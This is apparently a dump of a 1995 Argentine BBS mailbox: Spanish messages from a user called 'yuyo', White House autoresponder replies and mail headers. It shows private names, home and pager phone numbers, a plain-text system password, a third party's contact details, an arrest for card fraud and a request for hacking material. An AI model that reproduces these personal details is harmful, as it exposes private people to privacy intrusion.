suggestions are carefully recorded and communicated to the President weekly with a representative sampling of the mail. All of us at the White House are excited about the progress made with this historic project, and we look forward to future developments. Your continued interest and participation are very important to us. Sincerely, Stephen K. Horn Director, Presidential Email The Office of Correspondence P.S. Please read on - you may find the following information useful. -- This is the only electronic message you will receive from whitehouse.gov. No other message purporting to be from the President or his staff at whitehouse.gov is verifiable. If you have received such a message, you have been spoofed. You will receive only one autoresponder message per day. -- The only personal addresses at whitehouse.gov are the following: President@whitehouse.gov and Vice.President@whitehouse.gov Please write to The First Lady and Mrs. Gore by regular mail. The address is: The White House, Washington, D.C. 20500. -- Many are asking about the text for the State of the Union Address and about the List of Clinton Administration Accomplishments. These are available by email. See the instructions for publications retrieval below. -- On October 20, 1994, President Clinton and Vice President Gore increased the accessibility of government information by opening a World Wide Web home page called "Welcome to the White House: An Interactive Citizens' Handbook". This new WWW service provides a single point of access to all electronic government information on the Internet. "Welcome to the White House" can be accessed at: http://www.whitehouse.gov -- On January 5, 1995, The House of Representatives also established a new World Wide Web site for electronic access to bills before Congress (and other legislative data). Access the House Web site at: http://www.house.gov -- White House documents and publications are available by email. To receive instructions, please send a message to the following address (**do not "reply" to the memo you are now reading**): publications@whitehouse.gov In the body of your message, type "Send Info" (without quotes); no other text should be included (including message headers or signature lines (.sig files)). The instructions will be sent to you automatically. **************************************************************** State of the Union Address as delivered by the President on January 24, 1995. To retrieve the text, use the following commands: To: publications@whitehouse.gov Message body: send file 317535 List of Accomplishments (three documents compose the whole): To: publications@whitehouse.gov Message body: send file 317571 send file 317573 send file 317575 **************************************************************** -- The White House Public Access Email FAQ (Frequently Asked Questions) document is available at the following address. The FAQ, among other things, lists alternate sources of government information, i.e., the Congressional email projects. Send an email message (no text necessary) to: faq@whitehouse.gov (This FAQ address is an autoresponder only; any comment sent to this address will not be acknowledged.) #*** Siguiente mensaje ***# Mens.: 60 De : yuyo A : daniel@ubik.satlink.net Tema : yuyo Fecha: 05/09/1995 22:59:00 me gustaria mantener la reunion que teniamos para hoy maniana miercoles. viajo confirmado a el viernes a rio. es de suma importancia que nos veamos. #*** Siguiente mensaje ***# Mens.: 61 De : yuyo A : fernando@ubik.satlink.net Tema : yuyo Fecha: 05/09/1995 23:00:25 me gustaria mantener la reunion que teniamos parahoy manian miercoles. viajo confirmado el viernes a rio . es de suma importancia que nos veamos #*** Siguiente mensaje ***# Mens.: 62 De : yuyo A : uunet!dc.uba.ar!gisvi Tema : yuyo Fecha: 06/09/1995 00:06:17 por favor repetir mensaje #*** Siguiente mensaje ***# Mens.: 63 De : yuyo A : info@nw.com Tema : FORMAS PAGO Fecha: 06/09/1995 10:18:17 My English is not very good, but y need know how to pay the CTEK, CTC900 and CTC 1150. Y resident in Argentina. Where y have the cash or the check? Thanks. #*** Siguiente mensaje ***# Mens.: 64 De : yuyo A : jel Tema : sistema conectado Fecha: 11/09/1995 20:26:15 A partir de este momento ya estoy conectado con el sistema en casa. Espero que m e llames esta noche para empezar a practicar. Saludos, yuyo #*** Siguiente mensaje ***# Mens.: 65 De : yuyo A : howard Tema : Fecha: 12/09/1995 10:49:21 sorry por lo de recien pero estoy practicando estaba sin dormir ok saludos y a tu disposicion yuyo #*** Siguiente mensaje ***# Mens.: 66 De : yuyo A : howard Tema : urgente Fecha: 12/09/1995 11:28:34 mira presiono como me decis pero me lo revota desde ya que te agradesco tu cooperacion me esta volviendo loco esto #*** Siguiente mensaje ***# Mens.: 67 De : yuyo A : howard Tema : mira salgo por 5 mtos voy a tomar un fecatel* Fecha: 12/09/1995 11:30:39 #*** Siguiente mensaje ***# Mens.: 68 De : yuyo A : howard Tema : ense;anza Fecha: 12/09/1995 11:43:29 de este sistema ok estoy de nuevo se esta callendo el sistema a cada rato yuyo #*** Siguiente mensaje ***# Mens.: 69 De : yuyo A : daniel@ubik.satlink.net Tema : conferencia Fecha: 12/09/1995 12:11:57 hola daniel como estas cuando puesdas llamame hoy estara en casa bosa apartir de las 17 hs ya que me esta programando esto saludos yuyo/fin #*** Siguiente mensaje ***# Mens.: 70 De : yuyo A : lobonegro Tema : Fecha: 12/09/1995 12:16:13 mira cuando quieras convesar llamame ok yuyo #*** Siguiente mensaje ***# Mens.: 71 De : yuyo A : fernando@ubik.satlink.net Tema : reunion Fecha: 12/09/1995 13:17:11 estimado fernado hoy te espero a eso de las 18 hs para hablar y reprogramar esta maquina que tan gentilmente me ha regalado mp on line saludos yuyo/fin #*** Siguiente mensaje ***# Mens.: 72 De : yuyo A : duracell Tema : Fecha: 12/09/1995 13:34:04 en 10 mts entro en sistema ok chau bybyb #*** Siguiente mensaje ***# Mens.: 73 De : yuyo A : yuyo Tema : provar Fecha: 12/09/1995 15:03:31 hola como te va queria saber como andas saludos yuyo ///////fin #*** Siguiente mensaje ***# Mens.: 74 De : yuyo A : jel Tema : comunicacion Fecha: 12/09/1995 18:24:50 espero que me llames esta noche yuyo #*** Siguiente mensaje ***# Mens.: 75 De : yuyo A : martin@caparros.satlink.net Tema : lo hablado hoy Fecha: 12/09/1995 18:40:36 te confirmo eso viaje pero el costo por tkt es de usd 300/ pesos c/u se cobra el 50por adelantado y el resto al a entrega espero tu respuesta si es posble hoy mejor saludos yuyo/fin #*** Siguiente mensaje ***# Mens.: 76 De : yuyo A : fernando@ubik.satlink.net Tema : personal Fecha: 12/09/1995 20:05:05 lamento mucho la perdida de tu tia trasmite mi pesar a tu familia raul horacio barragan #*** Siguiente mensaje ***# Mens.: 77 De : yuyo A : jel Tema : llamada Fecha: 12/09/1995 21:51:25 pls si podes hoy 12/09/95 llamame al 9626761 #*** Siguiente mensaje ***# Mens.: 78 De : yuyo A : daniel@ubik.satlink.net Tema : fallecimiento tia bonsa Fecha: 13/09/1995 00:05:50 daniel hoy fallecio la tia del bonsa quiciera arreglar con vos para ver que hacer saludos yuyo #*** Siguiente mensaje ***# Mens.: 79 De : yuyo A : dela Tema : x Fecha: 13/09/1995 02:15:22 mira confia en mi pero tampoco puedo darte 100 79e segurida de todos modos manan a te contactare para darte las novedades gracis yuyo p/d pls my telefhono nemer pls top secret ok/ #*** Siguiente mensaje ***# Mens.: 80 De : yuyo A : gianni Tema : Fecha: 13/09/1995 03:28:30 pls si podes llamame al 9640774/9626761 #*** Siguiente mensaje ***# Mens.: 81 De : yuyo A : valonso@mponline.com.ar Tema : agradecimiento Fecha: 13/09/1995 13:35:25 por la presente te agradesco la nota publicada el el nro86 de compu magazine aprovecho para que lo hagas estenso a todo el staff y en especial a alejandro atentamente yuyo raul horacio barragan #*** Siguiente mensaje ***# Mens.: 82 De : yuyo A : duracell Tema : ctc Fecha: 14/09/1995 16:39:43 gracias por sacarme de ese programa .. estaba hasta las mano /ll #*** Siguiente mensaje ***# Mens.: 83 De : yuyo A : elmalo Tema : che no es para tanto no Fecha: 14/09/1995 16:41:39 referente al loibbro cha raul llama via fone a #*** Siguiente mensaje ***# Mens.: 84 De : yuyo A : gianni Tema : comunicacion Fecha: 14/09/1995 16:53:24 gianni cuando puedas llamme a casa che gracias por lo de la maquina como habras visto estoy todo el dia conectadso, me preocupa que no estan llegando los msg de internet ni saliendo tampoco #*** Siguiente mensaje ***# Mens.: 85 De : yuyo A : duracell Tema : conexion Fecha: 14/09/1995 17:01:44 donde estas que no te encuentro yuyo #*** Siguiente mensaje ***# Mens.: 86 De : yuyo A : duracell Tema : conferencia Fecha: 14/09/1995 18:34:56 che cuando te conectes avisame ok ya que hoy estuviste ocupado saludos yuyo #*** Siguiente mensaje ***# Mens.: 87 De : yuyo A : daniel@ubik.satlink.net Tema : feliz cumplanos Fecha: 14/09/1995 18:42:20 daniel que tengas un muy buen dias y fetejes de lo mejor stop nn urg ctc para hablar temas muy impotantes stop cfm viaje a brasil el sun ar 22 hs ezegig hk4 saludos yuyo #*** Siguiente mensaje ***# Mens.: 88 De : yuyo A : vlad Tema : ctc Fecha: 14/09/1995 21:47:36 hola como te va mira cualquier cosa si queres mantenemos una conversacion y lo que nnececites si esta a mi alcance desde ya a vuestra dispocicion saludos yuyo #*** Siguiente mensaje ***# Mens.: 89 De : yuyo A : duracell Tema : estas en el mud Fecha: 14/09/1995 22:29:21 #*** Siguiente mensaje ***# Mens.: 90 De : yuyo A : dela Tema : novia en mvd Fecha: 15/09/1995 00:01:40 /ll chorro che vos me ivas a llamar que paso #*** Siguiente mensaje ***# Mens.: 91 De : yuyo A : vivi Tema : msg Fecha: 15/09/1995 00:32:23 hola perdon hoy por noo enviarte un msg pero no daba a tiempo seguis con gianni bueno nos vemos manna #*** Siguiente mensaje ***# Mens.: 92 De : yuyo A : dela Tema : cfn Fecha: 15/09/1995 00:35:24 llamame manan chau saludos #*** Siguiente mensaje ***# Mens.: 93 De : yuyo A : duracell Tema : saludos Fecha: 15/09/1995 10:56:49 che no saludaste hoy buenos dias #*** Siguiente mensaje ***# Mens.: 94 De : yuyo A : walfav Tema : ctc Fecha: 15/09/1995 11:29:52 hola walter cuando queras hacemos esa reunion con el tema de tomar el cafe con tus amigos ok saludos yuyo #*** Siguiente mensaje ***# Mens.: 95 De : yuyo A : jel Tema : ctc Fecha: 15/09/1995 11:30:49 todabia seguios sin conectarte.!!!!!!! llamame cuando puedas yuyo #*** Siguiente mensaje ***# Mens.: 96 De : yuyo A : walfav Tema : ctc Fecha: 15/09/1995 12:38:08 mira cambie la clave por si la nececitas para enviar internet es 1956 #*** Siguiente mensaje ***# Mens.: 97 De : yuyo A : jfederico Tema : hola Fecha: 15/09/1995 12:39:14 n hola como te va #*** Siguiente mensaje ***# Mens.: 98 De : yuyo A : daniel@ubik.satlink.net Tema : salutaciones Fecha: 15/09/1995 13:26:43 feliz cumple amigo , que lo pases muy bien en el dia de la fecha saludos yuyo #*** Siguiente mensaje ***# Mens.: 99 De : yuyo A : walfav Tema : ctc Fecha: 15/09/1995 13:28:41 che que pasa estas morfando no se como ctc ya que te mando msg y no contestas na da bueno espero pronta respuesta saludos yuyo p/d sabes halgo de arce ya que tambpoco me llama... #*** Siguiente mensaje ***# Mens.: 100 De : yuyo A : fernado@ubik.satelink.net Tema : la palma gerado Fecha: 15/09/1995 14:13:11 mira este chico viaja a entre rios hoy en la noche y quiere verte para que le co nfirmes con el tema del equipo stop el fone de el en baires es01 812 8738 el de concep. del uruguay es 0442 25094/27474 cualquier cosa por favor llamrlo gracias y chauu contesta a veses un msg ok #*** Siguiente mensaje ***# Mens.: 101 De : yuyo A : walfav Tema : urgente Fecha: 15/09/1995 16:24:59 es para comunicar que esta preso marcos en el dto central de policias aparentemente jus de int. 27 fasicficaion de documentos publicos stop estodo lo que se por el momento stop tratare de concceguir maas informacion stop voy por linea privada sto lewr e inf stop yuyo #*** Siguiente mensaje ***# Mens.: 102 De : yuyo A : duracell Tema : donde estas pls Fecha: 15/09/1995 16:40:07 no te encuentro #*** Siguiente mensaje ***# Mens.: 103 De : yuyo A : walfav Tema : marco Fecha: 15/09/1995 16:53:21 hay alguna instruccion para mi pls #*** Siguiente mensaje ***# Mens.: 104 De : yuyo A : walfav Tema : marcos Fecha: 15/09/1995 20:11:09 att cesar reff de a lo conversado a las 19,hs contigo de la detencion de marco vedase me acaba de informar el comisario palacio, que lamentablente lo tiene defraudaci ones y estafas y prevencion de delitos stop ademas con una investigacion de mas de 6 meses que nada se puede hacer por que esta para cumplir dodo que tenia una condicional stop pero me asegura que haran todo lo posible para que sea lo mas suave stop nececito que me llames hoy mismo para que te pueda esplicar algunas c osas mas stop fue detenido en via publica cuando aparente,meente estaban compran do con tarjestas stop hay que avisarle a su madre y ademas tiene en el dertament o un gato y puede que alli este mi documento por que no lo encontraro y no allan aro el domicilio de yrigoyen saludo yuyo #*** Siguiente mensaje ***# Mens.: 105 De : yuyo A : dela Tema : ctc mvd Fecha: 15/09/1995 20:50:09 hace ctc urgente estoy esperando el ctc pls hacelo por que salgo media hora #*** Siguiente mensaje ***# Mens.: 106 De : yuyo A : fernando@ubik.satlink.net Tema : gerado la palma Fecha: 15/09/1995 21:27:57 mira aco de hablar con el padre y quiere que el dia lunes ejecutes la compra de todo el equipamiento ademas que le de 5 horas semanes de estudios yten lo posibl e en ingles stop mucho me gustaria que hables voz con el papa que es el medico d e cabesera de mi padre a los telefonos 0442 25094 particular y sino al consulto rio 0442 27474 para que auede mas formal cordialmente yuyo #*** Siguiente mensaje ***# Mens.: 107 De : yuyo A : dela Tema : mva Fecha: 15/09/1995 22:29:26 llamame cuando puedas #*** Siguiente mensaje ***# Mens.: 108 De : yuyo A : walfav Tema : marcos Fecha: 15/09/1995 22:31:35 resiviste el msg anterior pls dame respuesta por que necesio saber que es lo que quieren que haga a cesar debo llamarlo en 20 mtos y el comisario palasio llamara en una hora pls demen respuesta este es un proble de uds.. yuyo #*** Siguiente mensaje ***# Mens.: 109 De : yuyo A : walfav Tema : marcos Fecha: 15/09/1995 23:42:50 cuando termines de vajar llamame via fone [para habrir sistema ok #*** Siguiente mensaje ***# Mens.: 110 De : yuyo A : walfav Tema : marco Fecha: 15/09/1995 23:49:34 estoy en linea invisible esperando #*** Siguiente mensaje ***# Mens.: 111 De : yuyo A : walfav Tema : marco Fecha: 16/09/1995 02:17:23 [pls si ten alguna novedad llamame antes de viajar #*** Siguiente mensaje ***# Mens.: 112 De : yuyo A : walfav Tema : ctc yuyo hoy Fecha: 16/09/1995 02:51:13 radio mensage 348 9000 pin 1124790 pertenece pico #*** Siguiente mensaje ***# Mens.: 113 De : yuyo A : walfav Tema : marcos Fecha: 16/09/1995 21:10:30 saber si llamo pls comunicame si pudo hablar con arce gracias #*** Siguiente mensaje ***# Mens.: 114 De : yuyo A : jel Tema : contacto Fecha: 16/09/1995 22:20:12 hola julio como estas, espero que bien y bueno pronto soluciones el problema de tu moden saludos de hugo y mio #*** Siguiente mensaje ***# Mens.: 115 De : yuyo A : dela Tema : encuentro Fecha: 16/09/1995 22:25:57 mira lo siento mucho pero saves que tuve un inconveniente y lamentablemente no puede leer los msg hasta esta hora bueno si queres llamame manana y cordinamo s pero recin llego de gira de anoche asi que te imaginas como estoy me voy a dor mei son las 22,30 del sabados saludos yuyo #*** Siguiente mensaje ***# Mens.: 116 De : yuyo A : duracell Tema : viaje a usa Fecha: 16/09/1995 22:27:56 mira acabo de posponer por tres dias el viaje lo pase para el dia martes recien llego de anoche que sali de gira y segui de largo son las 22,30 hs del sabado y palme asi que me voy a dormir saludos yuyo #*** Siguiente mensaje ***# Mens.: 117 De : yuyo A : nora Tema : enviosd de msg Fecha: 16/09/1995 22:29:40 hola nora me podes dejar eun msg como se hace cuando envias un msg y queres sabe r si la otra persona la leyo. desde ya muchas gracias y saludos yuyo #*** Siguiente mensaje ***# Mens.: 118 De : yuyo A : enok Tema : encuentro Fecha: 16/09/1995 22:43:59 lamento lo de tu pierna che que te paso lei recien los msg y dela me comento que no podias ir hoy a la reunion espero que te mejores hoy cuando te salude salia despues del sistema me estaban esperando en la puerta y debia irme... buen fin de semana saludos yuyo sabado 22 45 hs/september 17/95 #*** Siguiente mensaje ***# Mens.: 119 De : yuyo A : duracell Tema : recuperacion Fecha: 17/09/1995 11:46:05 lenta pero segura,voy a almorzar a la costannera y regreso chauy #*** Siguiente mensaje ***# Mens.: 120 De : yuyo A : gianni Tema : hola loco cuando me llamas.. stop estoy aki aun saludos yuyo Fecha: 17/09/1995 12:45:44 #*** Siguiente mensaje ***# Mens.: 121 De : yuyo A : duracell Tema : prueva Fecha: 17/09/1995 14:35:16 de saber como saber que esta leido o no #*** Siguiente mensaje ***# Mens.: 122 De : yuyo A : gianni Tema : llamada Fecha: 17/09/1995 18:06:33 que eslo que pasa gianni, te envio msg a cada rato y ni siquieras los contestas hoy te envie uno con la mejor buena honda y nada y por lo que veo por la maquina lo leistes y no me contetaste ok intentare hablarte el dia lunes a mp o a tu ofisina saludos muy cordialmente yuyo barragan nota 962 6761 964 0744 son de mi casa chau #*** Siguiente mensaje ***# Mens.: 123 De : yuyo A : dela Tema : ctc Fecha: 17/09/1995 18:19:06 cuando estes por entar aviosame yuyo [A[A[A[A[A #*** Siguiente mensaje ***# Mens.: 124 De : yuyo A : elmalo Tema : ctc Fecha: 17/09/1995 18:21:19 espera un poco estoy leyendo msg #*** Siguiente mensaje ***# Mens.: 125 De : yuyo A : elmalo Tema : estas Fecha: 17/09/1995 18:24:32 toidabia estas por alli voy a tu encuentro en diez mitos #*** Siguiente mensaje ***# Mens.: 126 De : yuyo A : duracell Tema : ctc Fecha: 17/09/1995 19:02:20 cuando salgas a la maquina llamame /962 6761 #*** Siguiente mensaje ***# Mens.: 127 De : yuyo A : jagger Tema : ctc Fecha: 17/09/1995 20:57:36 pedazo de forro despues hablamos... con trolo no"">}}}}}{{{{::>>>< To: The original message was received at Tue, 29 Aug 1995 06:00:53 -0400 from uucp3.UU.NET [192.48.96.34] ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- 501 ... 550 Host unknown (Name server: whithose.gov: host not found) ----- Original message follows ----- Return-Path: Received: from uucp3.UU.NET by relay3.UU.NET with SMTP id QQzewe00409; Tue, 29 Aug 1995 06:00:53 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Tue, 29 Aug 1995 06:00:53 -0400 To: president@whithose.gov Subject: top urgent D.E.A. Top urgent Date: Mon Aug 28 23:22:37 rio 1995 Solicito que tenga a bien contactarme con el agente especial Ricardo Ramos y/o supervisor dado que usembasis bs.as. me a dejado de lado luego de 4 anios de trabajo arriesgando la vida. Y quisiera explayarme de lo que esta ocurriendo aqui. FIRMA SZ910014 #*** Siguiente mensaje ***# Mens.: 40 De : WhiteHouse.Gov!autoresponder A : yuyo Tema : Subject: Re: Top urgent D.E.A. Top urgent Fecha: 01/09/1995 07:05:16 Para: yuyo From WhiteHouse.Gov!autoresponder Fri Sep 1 05:55:55 1995 remote from uunet Received: from WhiteHouse.Gov by relay4.UU.NET with SMTP id QQzfhf19596; Fri, 1 Sep 1995 05:55:55 -0400 From: uunet!WhiteHouse.Gov!autoresponder Received: by WhiteHouse.Gov (5.65/fma/mjr-120691); id AA09791; Fri, 1 Sep 95 05:55:41 -0400 Date: Fri, 1 Sep 95 05:55:41 -0400 Message-Id: <9509010955.AA09791@WhiteHouse.Gov> Subject: Re: Top urgent D.E.A. Top urgent To: uunet!mponline.com.ar!yuyo Thank you for writing to President Clinton via electronic mail. Since June 1993, whitehouse.gov has received over 475,000 messages from people all across the country and the world. Because so many of you write, the President cannot personally review each message. The mail is first read by White House Correspondence staff. Your concerns, ideas, and suggestions are carefully recorded and communicated to the President weekly with a representative sampling of the mail. All of us at the White House are excited about the progress made with this historic project, and we look forward to future developments. Your continued interest and participation are very important to us. Sincerely, Stephen K. Horn Director, Presidential Email The Office of Correspondence P.S. Please read on - you may find the following information useful. -- This is the only electronic message you will receive from whitehouse.gov. No other message purporting to be from the President or his staff at whitehouse.gov is verifiable. If you have received such a message, you have been spoofed. You will receive only one autoresponder message per day. -- The only personal addresses at whitehouse.gov are the following: President@whitehouse.gov and Vice.President@whitehouse.gov Please write to The First Lady and Mrs. Gore by regular mail. The address is: The White House, Washington, D.C. 20500. -- Many are asking about the text for the State of the Union Address and about the List of Clinton Administration Accomplishments. These are available by email. See the instructions for publications retrieval below. -- On October 20, 1994, President Clinton and Vice President Gore increased the accessibility of government information by opening a World Wide Web home page called "Welcome to the White House: An Interactive Citizens' Handbook". This new WWW service provides a single point of access to all electronic government information on the Internet. "Welcome to the White House" can be accessed at: http://www.whitehouse.gov -- On January 5, 1995, The House of Representatives also established a new World Wide Web site for electronic access to bills before Congress (and other legislative data). Access the House Web site at: http://www.house.gov -- White House documents and publications are available by email. To receive instructions, please send a message to the following address (**do not "reply" to the memo you are now reading**): publications@whitehouse.gov In the body of your message, type "Send Info" (without quotes); no other text should be included (including message headers or signature lines (.sig files)). The instructions will be sent to you automatically. **************************************************************** State of the Union Address as delivered by the President on January 24, 1995. To retrieve the text, use the following commands: To: publications@whitehouse.gov Message body: send file 317535 List of Accomplishments (three documents compose the whole): To: publications@whitehouse.gov Message body: send file 317571 send file 317573 send file 317575 **************************************************************** -- The White House Public Access Email FAQ (Frequently Asked Questions) document is available at the following address. The FAQ, among other things, lists alternate sources of government information, i.e., the Congressional email projects. Send an email message (no text necessary) to: faq@whitehouse.gov (This FAQ address is an autoresponder only; any comment sent to this address will not be acknowledged.) #*** Siguiente mensaje ***# Mens.: 42 De : dc.uba.ar!gisvi A : yuyo Tema : Subject: Re: programa cable Fecha: 03/09/1995 07:10:13 Para: yuyo From dc.uba.ar!gisvi Sat Sep 2 11:59:12 1995 remote from uunet Received: from ccc.uba.ar by relay3.UU.NET with SMTP id QQzflv09962; Sat, 2 Sep 1995 11:59:12 -0400 Received: from dc.uba.ar by ccc.uba.ar with smtp (Smail3.1.28.1 #5) id m0soisi-000E5OC; Sat, 2 Sep 95 01:04 GMT-1:00 Received: by dc.uba.ar (Smail3.1.29.1 #1) id m0soIyt-000GkVC; Thu, 31 Aug 95 20:25 GMT-3:00 Message-Id: From: uunet!dc.uba.ar!gisvi (Grupo Investigacion Virus ) Subject: Re: programa cable To: uunet!mponline.com.ar!yuyo Date: Thu, 31 Aug 1995 20:25:11 -0300 (GMT-3:00) In-Reply-To: from "yuyo@mponline.com.ar" at Aug 28, 95 11:17:13 pm X-Mailer: ELM [version 2.4 PL13] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 0 #*** Siguiente mensaje ***# Mens.: 43 De : WhiteHouse.Gov!autoresponder A : yuyo Tema : Subject: Re: DEA Fecha: 04/09/1995 06:59:07 Para: yuyo From WhiteHouse.Gov!autoresponder Sun Sep 3 06:11:10 1995 remote from uunet Received: from WhiteHouse.Gov by relay1.UU.NET with SMTP id QQzfoq23028; Sun, 3 Sep 1995 06:11:10 -0400 From: uunet!WhiteHouse.Gov!autoresponder Received: by WhiteHouse.Gov (5.65/fma/mjr-120691); id AA08905; Sun, 3 Sep 95 06:10:58 -0400 Date: Sun, 3 Sep 95 06:10:58 -0400 Message-Id: <9509031010.AA08905@WhiteHouse.Gov> Subject: Re: DEA To: uunet!mponline.com.ar!yuyo Thank you for writing to President Clinton via electronic mail. Since June 1993, whitehouse.gov has received over 475,000 messages from people all across the country and the world. Because so many of you write, the President cannot personally review each message. The mail is first read by White House Correspondence staff. Your concerns, ideas, and suggestions are carefully recorded and communicated to the President weekly with a representative sampling of the mail. All of us at the White House are excited about the progress made with this historic project, and we look forward to future developments. Your continued interest and participation are very important to us. Sincerely, Stephen K. Horn Director, Presidential Email The Office of Correspondence P.S. Please read on - you may find the following information useful. -- This is the only electronic message you will receive from whitehouse.gov. No other message purporting to be from the President or his staff at whitehouse.gov is verifiable. If you have received such a message, you have been spoofed. You will receive only one autoresponder message per day. -- The only personal addresses at whitehouse.gov are the following: President@whitehouse.gov and Vice.President@whitehouse.gov Please write to The First Lady and Mrs. Gore by regular mail. The address is: The White House, Washington, D.C. 20500. -- Many are asking about the text for the State of the Union Address and about the List of Clinton Administration Accomplishments. These are available by email. See the instructions for publications retrieval below. -- On October 20, 1994, President Clinton and Vice President Gore increased the accessibility of government information by opening a World Wide Web home page called "Welcome to the White House: An Interactive Citizens' Handbook". This new WWW service provides a single point of access to all electronic government information on the Internet. "Welcome to the White House" can be accessed at: http://www.whitehouse.gov -- On January 5, 1995, The House of Representatives also established a new World Wide Web site for electronic access to bills before Congress (and other legislative data). Access the House Web site at: http://www.house.gov -- White House documents and publications are available by email. To receive instructions, please send a message to the following address (**do not "reply" to the memo you are now reading**): publications@whitehouse.gov In the body of your message, type "Send Info" (without quotes); no other text should be included (including message headers or signature lines (.sig files)). The instructions will be sent to you automatically. **************************************************************** State of the Union Address as delivered by the President on January 24, 1995. To retrieve the text, use the following commands: To: publications@whitehouse.gov Message body: send file 317535 List of Accomplishments (three documents compose the whole): To: publications@whitehouse.gov Message body: send file 317571 send file 317573 send file 317575 **************************************************************** -- The White House Public Access Email FAQ (Frequently Asked Questions) document is available at the following address. The FAQ, among other things, lists alternate sources of government information, i.e., the Congressional email projects. Send an email message (no text necessary) to: faq@whitehouse.gov (This FAQ address is an autoresponder only; any comment sent to this address will not be acknowledged.) #*** Siguiente mensaje ***# Mens.: 44 De : un1.satlink.com!satlink!caparros!Martin A : yuyo Tema : Fecha: 07/09/1995 07:08:09 Para: yuyo From un1.satlink.com!satlink!caparros!Martin Wed Sep 6 16:01:39 1995 remote from uunet Received: from un1.satlink.com by relay4.UU.NET with SMTP id QQzgbg13212; Wed, 6 Sep 1995 16:01:39 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id QAA09625 for yuyo@mponline.com.ar; Wed, 6 Sep 1995 16:59:16 -0400 Message-Id: <199509062059.QAA09625@un1.satlink.com> Received: by satlink.net with uucp (FX UUCP) for yuyo@mponline.com.ar; Wed, 06 Sep 95 16:42:48 -0400 Received: from martin@caparros.satlink.net by WPEGWAF ver. á0.6 at Wed, 6 Sep 1995 16:42:04 ARG From: uunet!caparros.satlink.net!martin To: uunet!mponline.com.ar!yuyo Date: Wed, 6 Sep 1995 16:42:04 ARG Return-receipt-to: uunet!caparros.satlink.net!Martin Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) via SatLink UUCP te mando, como habiamos dicho, mi direcccion electronica que, como consta en el encabezamiento, es martin@caparros.satlink.net. Bueno, supongo que nos pondremos en contacto pronto. Un abrazo, martin --- Martin Caparros E-mail: martin@caparros.satlink.net Buenos Aires - Argentina #*** Siguiente mensaje ***# Mens.: 45 De : nw.com!nw A : yuyo Tema : Subject: Re: FORMAS PAGO Fecha: 09/09/1995 07:03:12 Para: yuyo From nw.com!nw Fri Sep 8 23:54:38 1995 remote from uunet Received: from nw.com by relay1.UU.NET with SMTP id QQzgjv19819; Fri, 8 Sep 1995 23:54:38 -0400 Received: from localhost (nw@localhost) by nw.com (8.6.5/8.6.5) id UAA11882 for yuyo@mponline.com.ar; Fri, 8 Sep 1995 20:56:35 -0700 Date: Fri, 8 Sep 95 20:56:34 PDT From: Network Wizards To: uunet!mponline.com.ar!yuyo Subject: Re: FORMAS PAGO In-Reply-To: Your message of Wed Sep 06 10:18:16 rio 1995 Message-ID: Hi - >My English is not very good, but y need know how to pay the CTEK, CTC900 and CTC >1150. Y resident in Argentina. Where y have the cash or the check? You can send a check to Network Wizards PO Box 343 Menlo Park, CA 94026 USA The price is: ctek $100 ctc900 $25 ctc1150 $25 shipping $10 thanks, Mark #*** Siguiente mensaje ***# Mens.: 46 De : walfav A : yuyo Tema : pruebas Fecha: 12/09/1995 16:13:21 hola!!!! #*** Siguiente mensaje ***# Mens.: 47 De : cabezon (fwd:cabezon) A : yuyo Tema : chistes hablados Fecha: 12/09/1995 17:47:07 ahi va un chiste de mi coleccion ------- Archivos adosados ------- YO.WAV .... 2822444 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 48 De : yuyo A : yuyo Tema : provar Fecha: 12/09/1995 15:03:31 hola como te va queria saber como andas saludos yuyo ///////fin #*** Siguiente mensaje ***# Mens.: 49 De : dela A : yuyo Tema : ... Fecha: 13/09/1995 01:25:54 Te dejo los datos. Nombre : Jimena Apellido : Gomez Telefono : (059 llamando desde bs. as.) 425990 Montevideo (Uruguay ) Me olvide de preguntarte que tan seguro es esto, o sea, que riesgos hay.. trata de ser lo mas sincero posible ya que estoy confiando en vos totalmente al dejarte los datos y pedirte esto.. Chau, gracias.! #*** Siguiente mensaje ***# Mens.: 50 De : jazmin A : yuyo Tema : saludos Fecha: 13/09/1995 13:18:10 como estoy con un toco de trabajo no tengo mucho tirmpo para conversar[D[D[D[D[D [D[D[D[D[D asi que te mando un beso y espero que estes muy bien. chau, marisa #*** Siguiente mensaje ***# Mens.: 51 De : duracell A : yuyo Tema : modem.. Fecha: 13/09/1995 16:59:31 el modem es un usrobotics sportster de 28.8 (con v 34) si tenes algun fono de donde vas a estar alla dejame asi confirmamos lo del prec io.. #*** Siguiente mensaje ***# Mens.: 52 De : dela A : yuyo Tema : Hola! Fecha: 13/09/1995 20:58:45 Que tal! Te dejo este msg para sabes si te puedo llamar esta noche por telefono (por voz) .. parece que sabes mucho de esto.. me gustaria charlar un rato.. con tiempo seguramente debes tener cosas mas que interesantes para contar.. claro si queres dejame un msg con la hora a la que te puedo llamar.. Chau, suerte!: Gun. #*** Siguiente mensaje ***# Mens.: 53 De : elmalo (fwd:elmalo) A : yuyo Tema : hola! Fecha: 13/09/1995 21:10:57 ---------- COMENTARIO ---------- aca esta el forward del msg que te hab¡a enviado! es medio al pedo por que ya te pregunte por TE. chau! nos vemos. Ah! Tu telefono lo encrypte con un algoritmo mio de 3256 bits es medio enquilombado sacarlo! todo en orden ta la vista! ah! en el foro rev/varios estas el libro ese que me dijiste no se si esta completo, pero. ya lo bajo, chau -------------------------------- mira si sos yuyp hacker te pido me des una mano, ya que yo se bastante poco de hack y phreak, serias tan amable de pasarme lo que tengas de hack?? en el correo o en mi BBS o en el foro hobbies si sos tan amable.... POR FAVOOOOOOOOOOOOOOOOR!!! chau y gracias por adelantado #*** Siguiente mensaje ***# Mens.: 54 De : uki A : yuyo Tema : Fecha: 14/09/1995 19:25:57 Mira te estuve esperando pero me tengo que ir, me gustaria que sigamos escribiendonos, cualquier cosa yo me conecto o maniana despues del mediodia o a la noche..... Chau falso Yuyo Solamente [uki...] #*** Siguiente mensaje ***# Mens.: 55 De : uki A : yuyo Tema : Me voy vos sabes que se me hace muy tarde, chau uki Fecha: 14/09/1995 19:32:54 chau maniana nos escribimos #*** Siguiente mensaje ***# Mens.: 56 De : duracell A : yuyo Tema : ocupado Fecha: 14/09/1995 19:51:14 che 